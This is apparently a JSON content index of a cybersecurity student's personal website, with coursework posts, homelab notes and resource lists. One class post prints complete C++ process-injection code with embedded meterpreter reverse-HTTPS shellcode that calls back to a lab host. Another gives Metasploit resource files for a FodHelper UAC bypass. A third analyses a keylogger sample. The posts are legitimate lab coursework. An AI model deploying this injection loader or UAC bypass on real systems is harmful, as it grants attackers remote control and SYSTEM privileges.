[{"content":"This is a test for automation. I am setting up a homelab documentation that automatically gets pushed. The repo is here. ","date":"28 May 2026","externalUrl":null,"permalink":"/projects/home-server/3/","section":"Projects","summary":"","title":"Automation","type":"projects"},{"content":"","date":"28 May 2026","externalUrl":null,"permalink":"/series/home-server/","section":"Series","summary":"","title":"Home Server","type":"series"},{"content":"","date":"28 May 2026","externalUrl":null,"permalink":"/tags/home-server/","section":"Tags","summary":"","title":"Home Server","type":"tags"},{"content":"","date":"28 May 2026","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":"","date":"28 May 2026","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":" ","date":"28 May 2026","externalUrl":null,"permalink":"/","section":"Welcome to my website!","summary":"","title":"Welcome to my website!","type":"page"},{"content":"","date":"28 April 2026","externalUrl":null,"permalink":"/classwork/","section":"Classwork","summary":"","title":"Classwork","type":"classwork"},{"content":"","date":"28 April 2026","externalUrl":null,"permalink":"/tags/css/","section":"Tags","summary":"","title":"CSS","type":"tags"},{"content":"This is my DFOR 772 (Advanced Artifact Extraction) final project, an ALEAPP Telegram Parser. The GitHub link is available here. The link to ALEAPP is here.\nI first used ALEAPP in the wonderful Jessica Hyde\u0026rsquo;s mobile forensics course in the Fall of 2025. Without her, I would not have done this project. Open Presentation ","date":"28 April 2026","externalUrl":null,"permalink":"/classwork/772-final/","section":"Classwork","summary":"","title":"DFOR 772 Final","type":"classwork"},{"content":"","date":"28 April 2026","externalUrl":null,"permalink":"/tags/fun/","section":"Tags","summary":"","title":"Fun","type":"tags"},{"content":"","date":"28 April 2026","externalUrl":null,"permalink":"/tags/html/","section":"Tags","summary":"","title":"HTML","type":"tags"},{"content":"","date":"28 April 2026","externalUrl":null,"permalink":"/tags/javascript/","section":"Tags","summary":"","title":"Javascript","type":"tags"},{"content":"","date":"26 March 2026","externalUrl":null,"permalink":"/tags/github/","section":"Tags","summary":"","title":"GitHub","type":"tags"},{"content":" Matrix rain, in a presentation. # I\u0026rsquo;m a huge fan of the Matrix movies. While working at the House, I wanted to make a presentation that had the Matrix\u0026rsquo;s \u0026lsquo;code rain\u0026rsquo; effect in the background. Perhaps this is possible with Powerpoint, but I do not have the knowledge, skills, or inclination to suffer through this task. That turned into a deep dive in me learning Reveal.js. Reveal.js is a javascript framework that allows you to create a presentation in your browser.\nNeedless to say, it is significantly more customizable than PowerPoint. I used it to create a working proof of concept, available at this link. The GitHub repo for this project is here.\nBottom Line Up Front, here\u0026rsquo;s the demo video showcasing the modes of the presentation.\n","date":"26 March 2026","externalUrl":null,"permalink":"/misc/matrix-website/","section":"Miscellaneous","summary":"","title":"Matrix Website","type":"misc"},{"content":"","date":"26 March 2026","externalUrl":null,"permalink":"/misc/","section":"Miscellaneous","summary":"","title":"Miscellaneous","type":"misc"},{"content":"","date":"11 February 2026","externalUrl":null,"permalink":"/series/dfor-740-malware/","section":"Series","summary":"","title":"DFOR 740 Malware","type":"series"},{"content":" This article series is actively being worked on. Expect updates soon, specifically about Mythic C2, Cookie Stealers, and DLL search order hijacking This was one of the coolest school assignments I\u0026rsquo;ve ever done. Background # The homework assignment was as follows:\nYour homework is to inject shellcode into a REMOTE PROCESS on your Windows VM, and catch the shell from Kali. You will need to utilize Windows 32 APIs to do this. You will need to submit the code you used to run this (NOTE DO NOT SUBMIT THE SHELLCODE IN YOUR CODE, AS AV MIGHT HAVE A FIT), as well as a video of yourself generating the shellcode on kali, compiling the code + running the code on windows, and catching your shell on your kali virtual machine. Please also run a command on kali to show you have command access on the Windows host.\nPlease narrate your video, explaining the steps you are taking, which API functions you used, and the commands you ran (and why you ran them).\nDemonstration # I made a video for some family members to show at a high level what the malware does. The link to that youtube video is here.\nOutcome # I was able to compile a C++ executable that, when launched, spawned a notepad process, injected malicious code, and created a reverse connected back to my Kali Linux box. Importantly, this malware is very simple, and would be quickly flagged by most modern EDR solutions due to the EXECUTE_READWRITE memory permissions. A way I could potentially get around that is by first creating the memory write and read only, add my malicious payload, and then change it to only read and execute.\nOnce the reverse shell was connected, I used it to take screenshots of the victim machine\u0026rsquo;s desktop, edit files and add persistence.\nProject Code # The code, available here, is: #include \u0026lt;Windows.h\u0026gt; #include \u0026lt;cstdio\u0026gt; //this is the main function, and it is able to take any number of arguments. the arguments will be put into the array argv int main(int argc, char* argv[]) { /* this shellcode is the malicious C code created by msfvenom on kali with the options: -p windows/x64/meterpreter/reverse_https LPORT=443 LHOST=192.168.188.129 -f c */ unsigned char shellcode[893] = \u0026#34;\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xcc\\x00\\x00\\x00\\x41\\x51\\x41\\x50\u0026#34; \u0026#34;\\x52\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\u0026#34; \u0026#34;\\x8b\\x52\\x20\\x51\\x56\\x48\\x8b\\x72\\x50\\x4d\\x31\\xc9\\x48\\x0f\u0026#34; \u0026#34;\\xb7\\x4a\\x4a\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\u0026#34; \u0026#34;\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\u0026#34; \u0026#34;\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x0f\u0026#34; \u0026#34;\\x85\\x72\\x00\\x00\\x00\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\u0026#34; \u0026#34;\\x74\\x67\\x48\\x01\\xd0\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x50\\x49\u0026#34; \u0026#34;\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x4d\\x31\\xc9\\x41\\x8b\\x34\\x88\u0026#34; \u0026#34;\\x48\\x01\\xd6\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\u0026#34; \u0026#34;\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\u0026#34; \u0026#34;\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\u0026#34; \u0026#34;\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\\x41\u0026#34; \u0026#34;\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\u0026#34; \u0026#34;\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b\\x12\\xe9\u0026#34; \u0026#34;\\x4b\\xff\\xff\\xff\\x5d\\x48\\x31\\xdb\\x53\\x49\\xbe\\x77\\x69\\x6e\u0026#34; \u0026#34;\\x69\\x6e\\x65\\x74\\x00\\x41\\x56\\x48\\x89\\xe1\\x49\\xc7\\xc2\\x4c\u0026#34; \u0026#34;\\x77\\x26\\x07\\xff\\xd5\\x53\\x53\\xe8\\x77\\x00\\x00\\x00\\x4d\\x6f\u0026#34; \u0026#34;\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x4d\\x61\\x63\u0026#34; \u0026#34;\\x69\\x6e\\x74\\x6f\\x73\\x68\\x3b\\x20\\x49\\x6e\\x74\\x65\\x6c\\x20\u0026#34; \u0026#34;\\x4d\\x61\\x63\\x20\\x4f\\x53\\x20\\x58\\x20\\x31\\x34\\x5f\\x37\\x5f\u0026#34; \u0026#34;\\x32\\x29\\x20\\x41\\x70\\x70\\x6c\\x65\\x57\\x65\\x62\\x4b\\x69\\x74\u0026#34; \u0026#34;\\x2f\\x36\\x30\\x35\\x2e\\x31\\x2e\\x31\\x35\\x20\\x28\\x4b\\x48\\x54\u0026#34; \u0026#34;\\x4d\\x4c\\x2c\\x20\\x6c\\x69\\x6b\\x65\\x20\\x47\\x65\\x63\\x6b\\x6f\u0026#34; \u0026#34;\\x29\\x20\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x2f\\x31\\x37\\x2e\\x34\u0026#34; \u0026#34;\\x2e\\x31\\x20\\x53\\x61\\x66\\x61\\x72\\x69\\x2f\\x36\\x30\\x35\\x2e\u0026#34; \u0026#34;\\x31\\x2e\\x31\\x35\\x00\\x59\\x53\\x5a\\x4d\\x31\\xc0\\x4d\\x31\\xc9\u0026#34; \u0026#34;\\x53\\x53\\x49\\xba\\x3a\\x56\\x79\\xa7\\x00\\x00\\x00\\x00\\xff\\xd5\u0026#34; \u0026#34;\\xe8\\x10\\x00\\x00\\x00\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\u0026#34; \u0026#34;\\x38\\x38\\x2e\\x31\\x32\\x39\\x00\\x5a\\x48\\x89\\xc1\\x49\\xc7\\xc0\u0026#34; \u0026#34;\\xbb\\x01\\x00\\x00\\x4d\\x31\\xc9\\x53\\x53\\x6a\\x03\\x53\\x49\\xba\u0026#34; \u0026#34;\\x57\\x89\\x9f\\xc6\\x00\\x00\\x00\\x00\\xff\\xd5\\xe8\\x64\\x00\\x00\u0026#34; \u0026#34;\\x00\\x2f\\x77\\x4e\\x4e\\x49\\x7a\\x76\\x48\\x34\\x76\\x33\\x37\\x71\u0026#34; \u0026#34;\\x72\\x4f\\x75\\x75\\x67\\x7a\\x33\\x44\\x6d\\x51\\x55\\x4d\\x66\\x70\u0026#34; \u0026#34;\\x67\\x33\\x57\\x78\\x75\\x50\\x57\\x6a\\x67\\x58\\x7a\\x62\\x5a\\x2d\u0026#34; \u0026#34;\\x53\\x56\\x67\\x69\\x4f\\x51\\x46\\x78\\x4c\\x4f\\x71\\x46\\x2d\\x56\u0026#34; \u0026#34;\\x39\\x57\\x63\\x45\\x67\\x4a\\x6f\\x42\\x67\\x64\\x6d\\x35\\x50\\x34\u0026#34; \u0026#34;\\x76\\x74\\x4a\\x5f\\x68\\x6e\\x52\\x55\\x79\\x2d\\x75\\x52\\x71\\x46\u0026#34; \u0026#34;\\x57\\x38\\x79\\x71\\x71\\x4a\\x4f\\x61\\x39\\x65\\x73\\x30\\x6d\\x64\u0026#34; \u0026#34;\\x63\\x35\\x00\\x48\\x89\\xc1\\x53\\x5a\\x41\\x58\\x4d\\x31\\xc9\\x53\u0026#34; \u0026#34;\\x48\\xb8\\x00\\x32\\xa8\\x84\\x00\\x00\\x00\\x00\\x50\\x53\\x53\\x49\u0026#34; \u0026#34;\\xc7\\xc2\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x48\\x89\\xc6\\x6a\\x0a\\x5f\u0026#34; \u0026#34;\\x48\\x89\\xf1\\x6a\\x1f\\x5a\\x52\\x68\\x80\\x33\\x00\\x00\\x49\\x89\u0026#34; \u0026#34;\\xe0\\x6a\\x04\\x41\\x59\\x49\\xba\\x75\\x46\\x9e\\x86\\x00\\x00\\x00\u0026#34; \u0026#34;\\x00\\xff\\xd5\\x4d\\x31\\xc0\\x53\\x5a\\x48\\x89\\xf1\\x4d\\x31\\xc9\u0026#34; \u0026#34;\\x4d\\x31\\xc9\\x53\\x53\\x49\\xc7\\xc2\\x2d\\x06\\x18\\x7b\\xff\\xd5\u0026#34; \u0026#34;\\x85\\xc0\\x75\\x1f\\x48\\xc7\\xc1\\x88\\x13\\x00\\x00\\x49\\xba\\x44\u0026#34; \u0026#34;\\xf0\\x35\\xe0\\x00\\x00\\x00\\x00\\xff\\xd5\\x48\\xff\\xcf\\x74\\x02\u0026#34; \u0026#34;\\xeb\\xaa\\xe8\\x55\\x00\\x00\\x00\\x53\\x59\\x6a\\x40\\x5a\\x49\\x89\u0026#34; \u0026#34;\\xd1\\xc1\\xe2\\x10\\x49\\xc7\\xc0\\x00\\x10\\x00\\x00\\x49\\xba\\x58\u0026#34; \u0026#34;\\xa4\\x53\\xe5\\x00\\x00\\x00\\x00\\xff\\xd5\\x48\\x93\\x53\\x53\\x48\u0026#34; \u0026#34;\\x89\\xe7\\x48\\x89\\xf1\\x48\\x89\\xda\\x49\\xc7\\xc0\\x00\\x20\\x00\u0026#34; \u0026#34;\\x00\\x49\\x89\\xf9\\x49\\xba\\x12\\x96\\x89\\xe2\\x00\\x00\\x00\\x00\u0026#34; \u0026#34;\\xff\\xd5\\x48\\x83\\xc4\\x20\\x85\\xc0\\x74\\xb2\\x66\\x8b\\x07\\x48\u0026#34; \u0026#34;\\x01\\xc3\\x85\\xc0\\x75\\xd2\\x58\\xc3\\x58\\x6a\\x00\\x59\\x49\\xc7\u0026#34; \u0026#34;\\xc2\\xf0\\xb5\\xa2\\x56\\xff\\xd5\u0026#34;; //this is basically creating the variables that we will use HANDLE processHandle; HANDLE remoteThread; PVOID remoteBuffer; /* This is the old code from the example, it takes the PID to inject to as anargument and prints out the PID. printf(\u0026#34;Injecting to PID: %i\u0026#34;, atoi(argv[1])); processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1]))); */ //lambda function that creates notepad.exe, passes in startup info and outputs process info STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(L\u0026#34;C:\\\\Windows\\\\System32\\\\notepad.exe\u0026#34;, NULL, NULL, NULL, FALSE, 0, NULL, NULL, \u0026amp;si,\u0026amp; pi); wprintf(L\u0026#34;PID of injected Notepad: %lu\\n\u0026#34;, pi.dwProcessId); //handle of created process is available at pi.hProcess remoteBuffer = VirtualAllocEx(pi.hProcess, NULL, sizeof shellcode,(MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); WriteProcessMemory(pi.hProcess, remoteBuffer, shellcode, sizeof shellcode,NULL); remoteThread = CreateRemoteThread(pi.hProcess, NULL, 0,(LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return 0; } Code Template # The template for this assigment was ired.team\u0026rsquo;s post about this.\n","date":"11 February 2026","externalUrl":null,"permalink":"/classwork/metasploitable-c2/","section":"Classwork","summary":"","title":"Metasploitable C2","type":"classwork"},{"content":"","date":"11 February 2026","externalUrl":null,"permalink":"/tags/red-teaming/","section":"Tags","summary":"","title":"Red Teaming","type":"tags"},{"content":"From January 24th to January 25th, I was part of the inagural group of student scholars at DistrictCon, a DC-based hacker conference. While there, I spoke with vendors, hackers, and other students.\nI\u0026rsquo;d like to extend my heartfelt appreciation and gratitude to all the organizers who made this event and the student sponsoring happen. In particular, I\u0026rsquo;d like to shout out Sarah P. for being so flexible the arrangements and so invested in making sure each student got something out of it.\nIt was the first ever hacker conference I\u0026rsquo;ve been to. I participated in a really cool badge challenge made by Jeff, AKA BigTaro. His site (and a GIF of the badge in action) is available here.\nThe Talks # The Badge # The Weather # ","date":"25 January 2026","externalUrl":null,"permalink":"/networking-events/districtcon/","section":"Networking Events","summary":"","title":"DistrictCon 1.0","type":"networking-events"},{"content":"","date":"25 January 2026","externalUrl":null,"permalink":"/tags/hacker-conference/","section":"Tags","summary":"","title":"Hacker Conference","type":"tags"},{"content":"","date":"25 January 2026","externalUrl":null,"permalink":"/networking-events/","section":"Networking Events","summary":"","title":"Networking Events","type":"networking-events"},{"content":" Together with my friend Liam from Lusky.dev, I performed a static and dynamic analysis of 2 malicious binaries. This analysis was part of DFOR 761, the malware reverse engineering class at GMU.\nExecutive Summary # We determined that malware sample #1 was a Trojan Dropper, which is a piece of malware that attackers use to deploy further malware execution. This sample would constantly beacon out to a .biz domain in order to pull down additional malware or instructions. Malware sample #2 was determined to be an infostealer, specifically a keylogger that also recorded screenshots of the Victim’s computer once per second. We believe that this malware would then attempt to send the resulting screenshots and logged keys to the attacker, although we were not able to determine the destination or mechanism for this functionality.\nAnalysis Techniques Utilized # The following programs were used to conduct the analyses of the malware: Process Monitor (ProcMon), 010 Editor, Cutter, RegShot, ProcDot, and INetSim. The general analytic process followed the following workflow: First, we took snapshots of the registry using RegShot and then took a snapshot of the Virtual Machine prior to malware execution. Simultaneously, another VM with INetSim running was placed into a virtual network with the malware analysis VM. After this, ProcMon was loaded up in capture mode, and the malware was executed. The ProcMon logs were analyzed, converted into CSV, and passed into ProcDot for visual and timeline analysis. A second registry snapshot was taken and compared to the first. During our analysis, we separately conducted static analysis on our Remux virtual machine using Cutter, the peframe tool, and 010 Editor.\nTechnical Analysis of Malware 2 # Dynamic Analysis # We began this analysis by performing a dynamic analysis of the binary. Upon initially running the malware, no activity was observed. As we later discovered; due to this malware\u0026rsquo;s age, it has to be run as an administrator. After running the malware with administrator, we discovered with Process Monitor that the malware created the following files: A screenshot of Process Monitor showing the malware executable creating files. A screenshot of files created by the malware. Notably, the DPBJ.009 file is signficantly larger than the other files in this directory.\nWe also observed the malware2.exe process with PID 2500 spawning a process named DPBJ.exe with a PID of 4188. A screenshot of the malware creating a new process Within a few minutes of running the malware, the directory located at C:\\Windows\\SysWOW64\\28463\\ folder looked as it did below. Each of the photos in the preview shown below is a screenshot of the desktop of the VM, taken at one second intervals. The folder \\28463 filling up with screenshots. Interestingly, on a schedule that appeared to be about once a minute, the screenshots of the desktop in this folder all appeared to dissapear, and the DPBJ.009 file would increase in size. This lead us to suspect that the photos were being embedded inside that file. As shown below, carving of that file revealed the hex headers of a JPEG file (FF D8 to begin a file and FF D9 to end a file). Using HxD, we were able to sucessfully carve a screenshot from that file, confirming our suspicions. A screenshot of the beginning of a JPEG file carved from DPBJ.009 A screenshot of a JPEG file ending indicator, carved from DPBJ.009 Using INetSim, we were able to detect a DNS request for smtp.mail.yahoo.com, which is the only DNS request or network traffic we detected from the malware. I imagine that the malware has the ability to send it\u0026rsquo;s screenshots and captured keystrokes, and this is the mechanism the malware would use to accomplish that. If we had more time for this assignment, I would\u0026rsquo;ve searched for hardcoded email credentials and used a disassembler to look through the section of this malware that has this SMTP address. A screenshot of DNS traffic from the malware. A screenshot of the registry key that creates persistence. A screenshot from Process Monitor of the malware setting the autorun registry key. Note: The “AutoRuns” program from the SysInternals suite was also utilized and was not able to find any startup or persistence activity of the malware, which was unexpected. We believe that this is due to the \\Run being located in the WOW6432Node registry location, which predates the creation of the Autoruns program.\nWe also utilized ProcDot to create an execution timeline, but I personally did not get much value from this program. It was finnicky to set up, and by the time we got the program working, we already had a solid understanding of how what the program did. Perhaps with a more complicated malware sample, or after having the program set up correctly, it would provide more value. Nevertheless, I have included the screenshot of the ProcDot graph in this writeup. The text is illegible because scrolling out in ProcDot (necessary to capture the entire image) reduces the text size. A screenshot of ProcDot\u0026rsquo;s execution graph. Static Analysis # We used 010 Editor to get strings from @D607.tmp, created by malware2.exe and located in the C:\\Users\\USER\\AppData\\Local\\Temp directory. This analysis revealed several mentions to the Ardamax Keylogger. OSINT of this software gave us the understanding that this was originally legitmate software that was later hijacked by threat actors. A screenshot of strings from the keylogger file. This keylogger also had a license file, with the contents shown below. The file this key was located in was the key.bin file. It is unclear if this registration is tied to the specific threat actor, or a commonly shared license file distributed with the keylogger. This is another area of this investigation I would have spent more time. A screenshot of the keylogger license file. Using the malware\u0026rsquo;s Sha256 hash of 041411c41e5bbca3760e3cd7f9fb7f8e2fb14973bc8178bf056c3694baf9da04 we were able to find it\u0026rsquo;s detections on VirusTotal. A screenshot of VirusTotal detections for the malicious file. ","date":"8 December 2025","externalUrl":null,"permalink":"/classwork/keylogger-malware/","section":"Classwork","summary":"","title":"Keylogger Malware","type":"classwork"},{"content":"","date":"8 December 2025","externalUrl":null,"permalink":"/tags/malware/","section":"Tags","summary":"","title":"Malware","type":"tags"},{"content":"","date":"8 December 2025","externalUrl":null,"permalink":"/tags/reverse-engineering/","section":"Tags","summary":"","title":"Reverse Engineering","type":"tags"},{"content":" This article series is actively being worked on. Expect updates soon, specifically about Mythic C2, Cookie Stealers, and DLL search order hijacking. What is FODhelper? # FODHelper is a Windows program that allows execution at a higher system integrity level. In other words, this native Windows program (a LOLbin) can be used to execute commands as SYSTEM on a Windows PC. This is bad. Very bad.\nHow can it be used? # Metasploit has a built in payload for fodhelper. I was tired of typing in my Metasploit options every time, so I created 2 \u0026ldquo;resource\u0026rdquo; files. For those who don\u0026rsquo;t know, they\u0026rsquo;re basically environment variable files for Metasploit. The ones I used are below.\nFODSetup.rc # use exploit/windows/local/bypassuac_fodhelper set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.188.129 set LPORT 444 set TARGET 0 MultiSetup.rc # use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_https set LHOST 192.168.188.129 set LPORT 443 What was I able to do with this? # This is an extension of my previous article in the series. The additional funcationality is that I can now run as SYSTEM instead of the user. What this means is I can do things on the system that might be invisible to the user, such as activating/deactivating EDR functions, installing my own drivers or minifilters, or modifying system partitions.\nHow can you detect this? # I don\u0026rsquo;t go into depth in the video, but I used sysmon to detect this execution. This is not a great way to detect it, as it requires advance knowledge of the malware and my detection was only based on the command line name. Future work here would be focused on more behavioral-based detections.\nReferences # https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\n","date":"13 October 2025","externalUrl":null,"permalink":"/classwork/fodhelper/","section":"Classwork","summary":"","title":"Bypassing User Account Control with FodHelper","type":"classwork"},{"content":" Forensics OSINT Sandboxes Tools \u0026amp; Misc. Red Teaming Stark 4n6 Joshua Hickman\u0026rsquo;s Site SANS Eric Zimmerman\u0026rsquo;s Tools Guide SANS DFIR Fundementals SANS Enterprise Cloud Forensics Primer SANS Regex and Text parsing cheat sheet This Cyberchef recipe is very useful for hex decoding. Operating Systems # SANS SIFT workstation Evanole VM Remnux Memory # SANS Memory Forensics Cheat Sheet SANS Memory Forensics Malware Analysis # SANS Malware Analysis Cheat Sheet OS Forensics # SANS Third Party Windows Apps Forensics SANS Android Third Party Apps Forensics SANS Smartphone Forensics SANS Windows Forensics Cheat Sheet Network Forensics # SANS Network Forensics Poster An interesting OSINT concept using favicon hashes. SSLabs AbuseIPDB DomainToolsS VirusTotal Hybrid Analysis Palo Alto URLScan Cisco Talos Browserling Joe Sandbox Explain Shell SANS SQLite Cheat Sheet CyberChef File Signature Search Wikipedia File Signature List Let Me Google That For You (LMGTF) for when someone asks a dumb question.. Atomic Red Team Ransomware chats Table Generator Awesome Red Teaming Red Team Notes LOOBins (LOLBins for macOS) ","date":"13 October 2025","externalUrl":null,"permalink":"/misc/random-sites/","section":"Miscellaneous","summary":"","title":"Random Useful Websites","type":"misc"},{"content":"Well, I\u0026rsquo;ve officially caught the mini rack bug. You might be wondering, what is a mini rack?\nA mini lab is a miniaturized version of what most people think of when they picture a server. An example of both is shown below.\nA full size 19 inch server rack, probably about 40U tall? This is what I\u0026rsquo;m planning on making! # A 3D printed mini 10 inch server rack. This one is 6U I\u0026rsquo;ve never 3D printed before, but my younger brother just gifted me his old Creality Ender 3 Pro, so I\u0026rsquo;ll be using that (if I can figure out how to cut the longer pieces of the frame to fit on the bed.) This should be printed out of PETG for the heat resistance, so I also want to figure out some kind of enclosure and air purifiaction solution for the VOCs before I print. The reason why I want to 3D print it is both for cost and for the learning experience. I am going with a 10 inch rack because it fits the components I have better than a 19 inch one.\nOne of the challenges I am having is that my homelab doesn\u0026rsquo;t have any more SATA ports or PCIE slots, so I\u0026rsquo;m not sure how I\u0026rsquo;ll be able to add more drive capactiy to it. I really wanted to do a drive caddy like this: I have yet to figure out a way to connect those to my system. I was considering possibly a USB-to-sata bridge, to emulate my own version of a HDD enclosure. Unfortunately, I will probably have to get some kind of SFF power supply for the hard drives (and a fan) but that\u0026rsquo;s a problem for the future. If I can\u0026rsquo;t figure that out, I will probably get something like this enclosure.\nSome other components I am considering buying/printing:\nPSU for the rack Brush cable panel Rack mount for PC Lab Rax system More to come on this page soon!\n","date":"12 October 2025","externalUrl":null,"permalink":"/projects/home-server/2/","section":"Projects","summary":"","title":"The next evolution","type":"projects"},{"content":"","date":"11 October 2025","externalUrl":null,"permalink":"/certifications/","section":"Certifications","summary":"","title":"Certifications","type":"certifications"},{"content":" Passing Security+ - What Worked for Me # I\u0026rsquo;m excited to share that I passed the CompTIA Security+ exam on my first try! This has been a key milestone on my path into cybersecurity, and I wanted to take a moment to reflect on how I got here and what\u0026rsquo;s next.\nI chose to take this test because it is a baseline requirement for a lot of jobs in cybersecurity. Truthfully, I should\u0026rsquo;ve taken this test much sooner than I did, but I wanted a solid base in cybersecurity first. Some of the topics I had to get familiar with were:\nThreat detection \u0026amp; attack vectors Risk Mitigation Secure network and application architecture Access controls Identity and access managment Incident response Security+ covers all of that, and much more. It also serves as a prerequisite for more specialized certifications like CySA+, which is next on my list.\nHow I studied: # I studied part-time while working my internship, using a mix of video lectures, flashcards, practice exams, and hands-on labs. Here\u0026rsquo;s what worked best:\nProfessor Messer\u0026rsquo;s Youtube series Professor Messer\u0026rsquo;s exam notes and practice exams Exam Compass Practice Tests Anki Flashcards - these were mostly useful for ports, acronyms, and encryption algorithms. My homelab - I practiced creating firewall rules, sniffing packets, and running vulnerability scans. It was a really challenging test! My strategy was to give all the questions a good first answer (spending not more than ~2 minutes on each) and flagging the questions I wasn\u0026rsquo;t sure about. The PBQs were easily the hardest part of the test. I think that was one area that the practice material didn\u0026rsquo;t really cover well enough, so I felt slightly underprepared upon seeing those questions. Each of the PBQs took me the better part of 15 minutes on average. If I could go back, I would spend more time practicing with the simulations, especially under time pressure. The simulations test your ability under pressure just as much as they test your practical understanding.\nCheck the status of my certificate! # Final thoughts # If you\u0026rsquo;re considering taking the Security+, go for it. You don\u0026rsquo;t have to be an expert - just curious, consistent, and willing to learn.\nFeel free to reach out if you\u0026rsquo;re prepping for the exam. I\u0026rsquo;m happy to share tips or cheer you on!\n","date":"11 October 2025","externalUrl":null,"permalink":"/certifications/security-plus/","section":"Certifications","summary":"","title":"Security+","type":"certifications"},{"content":" I\u0026rsquo;m writing myself a cheat sheet for various Unix/DOS commands # This is mostly for me, but you might get value too.\nCtrl-L is clear screen bash. Which- location of executable strings - sudo find / -name \u0026ldquo;.\u0026rdquo; Nano section # ","date":"21 September 2025","externalUrl":null,"permalink":"/misc/cheat-sheet/","section":"Miscellaneous","summary":"","title":"Cheat Sheet","type":"misc"},{"content":"","date":"21 September 2025","externalUrl":null,"permalink":"/tags/guide/","section":"Tags","summary":"","title":"Guide","type":"tags"},{"content":" I\u0026rsquo;m still in the process of turning this into a proper series. # ","date":"21 September 2025","externalUrl":null,"permalink":"/projects/hugo-site/","section":"Projects","summary":"","title":"Hugo Site","type":"projects"},{"content":"No man ever steps in the same river twice, for it is not the same river and it is not the same man.\n-Hercliatus\nThe meaning of life is just to be alive. It is so plain and so obvious and so simple. And yet, everybody rushes around in a great panic as if it were necessary to achieve something beyond themselves.\n-Alan Watts\nThe best time to plan a cherry tree was 20 years ago. The second best time is now.\n-Unknown\n","date":"21 September 2025","externalUrl":null,"permalink":"/misc/quotes/","section":"Miscellaneous","summary":"","title":"Meaningful Quotes","type":"misc"},{"content":"While testing out some executables in my REMnux VM, i noticed that there was a typo in an error message of the program named xxxswf. I wanted to locate the source of that erroneously spelled message, so the following were my steps to locate it.\nFirst, I ran which to see where it was installed. Then, I ran strings against it to see what text was inside the executable. I saw it was a python executable, so I ran a find command on my entire system to locate the python executable. Then, I simply ran strings on the python file and used grep to find the erronious lines!\n","date":"2 September 2025","externalUrl":null,"permalink":"/misc/software-error-message/","section":"Miscellaneous","summary":"","title":"Software Error Message","type":"misc"},{"content":" Placeholder content until after day 1\nI recently had the pleasure of attending the NDIA conference at the Walter Washington Convention Center in DC. The emerging technology conference takes place once a year, and hosts breakout sessions, tech demonstrations, networking, and keynote speakers.\n","date":"24 August 2025","externalUrl":null,"permalink":"/networking-events/ndia/","section":"Networking Events","summary":"","title":"NDIA Expo","type":"networking-events"},{"content":"","date":"24 August 2025","externalUrl":null,"permalink":"/tags/networking/","section":"Tags","summary":"","title":"Networking","type":"tags"},{"content":"","date":"21 August 2025","externalUrl":null,"permalink":"/tags/cms/","section":"Tags","summary":"","title":"CMS","type":"tags"},{"content":"","date":"21 August 2025","externalUrl":null,"permalink":"/tags/hugo/","section":"Tags","summary":"","title":"Hugo","type":"tags"},{"content":" Content # Finally, I\u0026rsquo;ve set up my new website. The learning curve was (and is !) very steep. First, I had to find a tech stack that worked for me. In 2025, with many options to choose from, it was slightly overwhelming. What I was looking for was something cheaper, leaner, and less prone to cybersecurity incidents than the previous WordPress installation I had. I tried out various static site generator stacks, such as Jekyll and Gatsby.\nInitially, I had been somewhat insistent on the idea of a GUI-based webpage editor, as I wanted to replicate the familiar and comfortable experience that I\u0026rsquo;d had with WordPress. An area of high concern for me was media uploads. Dragging and dropping seemed so easy! While my current setup lacks the GUI editor (maybe not for long..), I have found that a markdown-based SSG setup is ideal for my needs and actually quite comfortable once one is familiar with the build process.\nSetting up the site for the first time was somewhat painful due to the Git learning curve. I\u0026rsquo;ve still not gotten as comfortable with it as I\u0026rsquo;d like, but it was just a matter of time before I was in a situation that I had to learn it - better late than never. I\u0026rsquo;ve also greatly enjoyed the experience of getting to completely customize the HTML and CSS of my site.\nWhile most likely something that only few visitors will spend time reading, I dumped hours’ worth of time into making my resume automatic. I have a google document for my resume that allows me to modify or view it across any of the devices I own. I wanted the resume to be auto-updating on my website, so I didn\u0026rsquo;t have to remember to do it. I also wanted private information such as my phone number, email, and zip code to be redacted. The way I figured out to do all of this is with a separate GitHub repository that, when a new push is sent to my regular blog repo, a new version of my resume is downloaded, compared, and updated if it does not match. Then, I perform some python magic, and voila! The sensitive text disappears!\nResources I used # ","date":"21 August 2025","externalUrl":null,"permalink":"/projects/hugo-site/migration/","section":"Projects","summary":"","title":"Setting up my website","type":"projects"},{"content":"","date":"20 August 